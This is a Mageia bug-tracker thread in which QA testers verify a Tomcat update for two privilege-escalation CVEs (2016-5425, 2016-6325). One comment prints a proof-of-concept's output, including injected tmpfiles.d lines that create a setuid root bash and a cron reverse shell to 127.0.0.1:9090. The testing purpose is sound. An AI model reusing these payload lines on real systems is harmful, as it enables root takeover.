Bug 19560 - tomcat new security issue CVE-2016-5425 and CVE-2016-6325
Summary: tomcat new security issue CVE-2016-5425 and CVE-2016-6325
Status: RESOLVED DUPLICATE of bug 19672
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 5
Hardware: All Linux
Priority: Normal critical
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/703243/
Whiteboard: MGA5-64-OK
Keywords:
Depends on:
Blocks:
 
Reported: 2016-10-10 17:30 CEST by David Walser
Modified: 2016-10-29 17:03 CEST (History)
4 users (show)

See Also:
Source RPM: tomcat-8.0.37-1.mga6.src.rpm
CVE:
Status comment:

Attachments
RedHat PoC script for CVE-2016-5425 (1.60 KB, application/x-shellscript)
2016-10-27 00:26 CEST, Len Lawrence 		Details
View All Add an attachment (proposed patch, testcase, etc.)

Description David Walser 2016-10-10 17:30:29 CEST 
A packaging security issue in Tomcat has been announced today (October 10):
http://openwall.com/lists/oss-security/2016/10/10/2
David Walser 2016-10-10 17:30:41 CEST

Whiteboard: (none) => MGA5TOO

Comment 1 David Walser 2016-10-11 20:18:39 CEST 
RedHat has issued an advisory for this on October 10:
https://rhn.redhat.com/errata/RHSA-2016-2046.html

URL: (none) => http://lwn.net/Vulnerabilities/703243/
Summary: tomcat new security issue CVE-2016-5425 => tomcat new security issue CVE-2016-5425 and CVE-2016-6325

Comment 2 Marja Van Waes 2016-10-13 12:15:12 CEST 
Assigning to maintainer

CC: (none) => marja11
Assignee: bugsquad => mageia

Comment 3 David GEIGER 2016-10-24 18:43:19 CEST 
CVE-2016-5425 and CVE-2016-6325 are fixed for both mga5 and cauldron!

CC: (none) => geiger.david68210

Comment 4 David Walser 2016-10-24 19:10:38 CEST 
Thanks David!

Testing procedure:
https://bugs.mageia.org/show_bug.cgi?id=8307#c17

Advisory:
========================

Updated tomcat packages fix security vulnerability:

It was discovered that the Tomcat packages installed configuration file
/usr/lib/tmpfiles.d/tomcat.conf writeable to the tomcat group. A member of the
group or a malicious web application deployed on Tomcat could use this flaw to
escalate their privileges (CVE-2016-5425).

It was discovered that the Tomcat packages installed certain configuration
files read by the Tomcat initialization script as writeable to the tomcat group.
A member of the group or a malicious web application deployed on Tomcat could
use this flaw to escalate their privileges (CVE-2016-6325).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6325
https://rhn.redhat.com/errata/RHSA-2016-2046.html
========================

Updated packages in core/updates_testing:
========================
tomcat-7.0.68-1.4.mga5
tomcat-admin-webapps-7.0.68-1.4.mga5
tomcat-docs-webapp-7.0.68-1.4.mga5
tomcat-javadoc-7.0.68-1.4.mga5
tomcat-jsvc-7.0.68-1.4.mga5
tomcat-jsp-2.2-api-7.0.68-1.4.mga5
tomcat-lib-7.0.68-1.4.mga5
tomcat-servlet-3.0-api-7.0.68-1.4.mga5
tomcat-el-2.2-api-7.0.68-1.4.mga5
tomcat-webapps-7.0.68-1.4.mga5

from tomcat-7.0.68-1.4.mga5.src.rpm

Version: Cauldron => 5
Assignee: mageia => qa-bugs
Whiteboard: MGA5TOO => (none)
Severity: normal => critical

Comment 5 Len Lawrence 2016-10-26 18:57:49 CEST 
Testing this on x86_64 with the advised procedure.

CC: (none) => tarazed25

Comment 6 Lewis Smith 2016-10-26 22:41:24 CEST 
Testing M5 x6' real hardware using to get started the test link:
 https://bugs.mageia.org/show_bug.cgi?id=8307#c17

@Len: I had already started looking into this yesterday...

BEFORE the update, I had to add 'tomcat-webapps' 'tomcat-admin-webapps':
 tomcat-7.0.68-1.3.mga5
 tomcat-admin-webapps-7.0.68-1.3.mga5
 tomcat-el-2.2-api-7.0.68-1.3.mga5
 tomcat-jsp-2.2-api-7.0.68-1.3.mga5
 tomcat-lib-7.0.68-1.3.mga5
 tomcat-servlet-3.0-api-7.0.68-1.3.mga5
 tomcat-webapps-7.0.68-1.3.mga5

"Edit /etc/tomcat/tomcat-users.xml and uncomment the users, adding manager-gui role to one of them"
I uncommented the given role/user list, and the subsequent
 <role rolename="manager-gui"/>
line; and added "manager-gui" to users tomcat & role1 roles.
 # systemctl restart tomcat.service

 http://localhost:8080/
Shows the entry page, with "Apache Tomcat/7.0.68" and "If you're seeing this, you've successfully installed Tomcat. Congratulations!";
and the "Manager App" button.

I could not initially login to that with either 'tomcat' or 'role1' pre-defined (and pre-noted) passwords, so maybe I did something wrong. The login error page explicitly said to add:-
 <role rolename="manager-gui"/>
 <user username="[...]" password="[...]" roles="manager-gui"/>
so I added a new user like that.
 # systemctl restart tomcat.service
and that worked, showing the "Tomcat Web Application Manager" page, which leads to all other things - including the .../examples and .../sample links. You only need the entry link above (if you can log in as Manager).

Tried lots of links, which mostly worked - and quickly -; but the 'WebSocket (JSR356) Examples' collection was a flop.

AFTER update of all the modules shown above to version -7.0.68-1.4.mga5, then
 # systemctl restart tomcat.service     [just in case]

All worked fine as before, tried other demonstration links - one of which invoked Java [IcedTea being installed] and worked, eventually.

One unhappiness: after successfully logging in as Manager before the update, I could see no way of logging OUT. After re-starting the Tomcat service post-update, the  http://localhost:8080/ "Manager App" link took me straight to the "Web Application Manager" page *without being asked to login*. I tried re-starting 'httpd' then 'tomcat' services, same problem. I cannot say whether this was true before the update; or perhaps a re-boot will resolve it. I will try that tomorrow.

In spite of which, the update looks good for the moment.

CC: (none) => lewyssmith
Whiteboard: (none) => MGA5-64-OK

Comment 7 Len Lawrence 2016-10-26 23:30:09 CEST 
Oh.  Sorry to tread on your toes.  I shall append my report anyway, having spent all evening on it.  Manages to run a PoC for one of the issues.
Comment 8 Len Lawrence 2016-10-26 23:35:17 CEST 
Installed updates piecemeal.
Cherry-picking after MageiaUpdate had provided:
      1/8: apache-commons-pool
      2/8: tomcat-el-2.2-api  
      3/8: tomcat-jsp-2.2-api 
      4/8: apache-commons-daemon
      5/8: geronimo-jta         
      6/8: apache-commons-dbcp  
      7/8: tomcat-lib           
      8/8: tomcat
Failed to open 'tomcat.conf', ignoring: No such file or directory
Installed the other packages listed.
# ls -l /etc/tomcat
total 224
drwxrwxr-x 3 root tomcat   4096 Oct 26 18:02 Catalina/
-rw-r--r-- 1 root tomcat  12257 Oct 24 17:40 catalina.policy
-rw-r--r-- 1 root tomcat   6322 Oct 24 17:40 catalina.properties
drwxr-xr-x 2 root tomcat   4096 Oct 26 18:02 conf.d/
-rw-r--r-- 1 root tomcat   1394 Oct 24 17:40 context.xml
-rw-r--r-- 1 root tomcat   3288 Oct 24 17:40 logging.properties
-rw-r--r-- 1 root tomcat   6613 Oct 24 17:40 server.xml
-rw-r--r-- 1 root tomcat   1825 Oct 24 17:40 tomcat.conf
-rw-r----- 1 root tomcat   1974 Oct 26 18:14 tomcat-users.xml
-rw-r----- 1 root tomcat   1998 Oct 24 17:40 tomcat-users.xml~
-rw-r--r-- 1 root tomcat 168818 Oct 24 17:40 web.xml

Edited tomcat-users.xml to give "role-rolename" manager-gui privileges.

Firefox -> http://localhost:8080/sample
This led to the "Hello, World" application and provided a couple of links, which worked.
Firefox -> http://localhost:8080/examples
This provided four links to follow.
One lists examples some of which are interactive and many of which provide the source code (Java, HTML).  Everything seemed to be working.
Comment 9 Len Lawrence 2016-10-26 23:41:42 CEST 
The CVE-2016-5425 link provides a PoC in the form of a script. 
$ ./tomcat-RH-root.sh 

* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
  Discovered by Dawid Golunski

[+] Checking vulnerability
stat: cannot stat â/usr/lib/tmpfiles.d/tomcat.confâ: No such file or directory
Not vulnerable or tomcat installed under a different user than 'tomcat'

The implication is that this should be tested under the user tomcat.
Comment 10 Len Lawrence 2016-10-26 23:43:49 CEST 
Moved to another machine and installed a new user = tomcat
Logged in as tomcat.
Installed the tomcat packages from normal updates and ran the test script.

$ ./tomcat-RH-root.sh

* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
  Discovered by Dawid Golunski

[+] Checking vulnerability
root tomcat

[+] Your system is vulnerable!

[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf...
[+] /usr/lib/tmpfiles.d/tomcat.conf contains:
f /var/run/tomcat.pid 0644 tomcat tomcat -
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n"

[+] Payload injected! Wait for your root shell...

Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), 
the rootshell will be created in /usr/share/tomcat/rootsh. 
Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090 

Updated the packages from Updates/Testing

$ ./tomcat-RH-root.sh

* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
  Discovered by Dawid Golunski

[+] Checking vulnerability
stat: cannot stat â/usr/lib/tmpfiles.d/tomcat.confâ: No such file or directory
Not vulnerable or tomcat installed under a different user than 'tomcat'

This demonstrates that the modifications have dealt with the vulnerability exposed in CVE-2016-5425.
Comment 11 Len Lawrence 2016-10-27 00:13:20 CEST 
For CVE-2016-6325 I think these directory listings show that tomcat cannot interfere with the system files, after the updates.

$ ls -l /etc/tomcat
total 220
drwxrwxr-x 3 root tomcat   4096 Oct 24 17:40 Catalina
-rw-r--r-- 1 root tomcat  12257 Oct 24 17:40 catalina.policy
-rw-r--r-- 1 root tomcat   6322 Oct 24 17:40 catalina.properties
drwxr-xr-x 2 root tomcat   4096 Oct 26 22:17 conf.d
-rw-r--r-- 1 root tomcat   1394 Oct 24 17:40 context.xml
-rw-r--r-- 1 root tomcat   3288 Oct 24 17:40 logging.properties
-rw-r--r-- 1 root tomcat   6613 Oct 24 17:40 server.xml
-rw-r--r-- 1 root tomcat   1825 Oct 24 17:40 tomcat.conf
-rw-r----- 1 root tomcat   1998 Oct 24 17:40 tomcat-users.xml
-rw-r--r-- 1 root tomcat 168818 Oct 24 17:40 web.xml
$ ls -l /etc/sysconfig/tomcat
-rw-r--r-- 1 root root 490 Oct 24 17:40 /etc/sysconfig/tomcat
Comment 12 Len Lawrence 2016-10-27 00:22:18 CEST 
@Lewis
I will try the admin route as well, tomorrow, to see if I hit the same problems.
Comment 13 Len Lawrence 2016-10-27 00:26:34 CEST 
Created attachment 8602 [details]
RedHat PoC script for CVE-2016-5425
Comment 14 Len Lawrence 2016-10-27 11:57:18 CEST 
Tried the localhost:8080 interface.  That came up fine and allowed an admin login for manage interface.  Checked server status and looked for leaks - none reported.  Used Back button to get back to the initial interface.  Closed tab.
Went back in.  Clicked "Manager App".  This went straight to the manager page without a login so admin had not been logged out.  Closed tab.

Closing browser, stopping tomcat.service and logging out.
Comment 15 Len Lawrence 2016-10-27 12:49:26 CEST 
Not sure if rebooting helped.  Pointed firefox at localhost:8080 again and tried the manager app button and went to the Web Application Manager page immediately.  Previously this always raised a 403 error - not privileged.
Back to the main interface and tried Host manager.  That gave a 403 error which indicates that the session did not belong to admin.  Before rebooting I had logged in as the designated user by invoking Host manager.  Looks like the last login persists across reboots.

Perused some of the documentation to find hints on using the web gui, in particular how to log out, and there was nothing.  Nothing in the FAQ section.  The documentation is sadly lacking in any kind of help for real beginners.  Instead you are advised to take your queries to the user community and subscribe to the mailing list.  !!
Comment 16 David Walser 2016-10-29 17:03:32 CEST 
Moving this to Bug 19672.

*** This bug has been marked as a duplicate of bug 19672 ***

Status: NEW => RESOLVED
Resolution: (none) => DUPLICATE
Note You need to log in before you can comment on or make changes to this bug.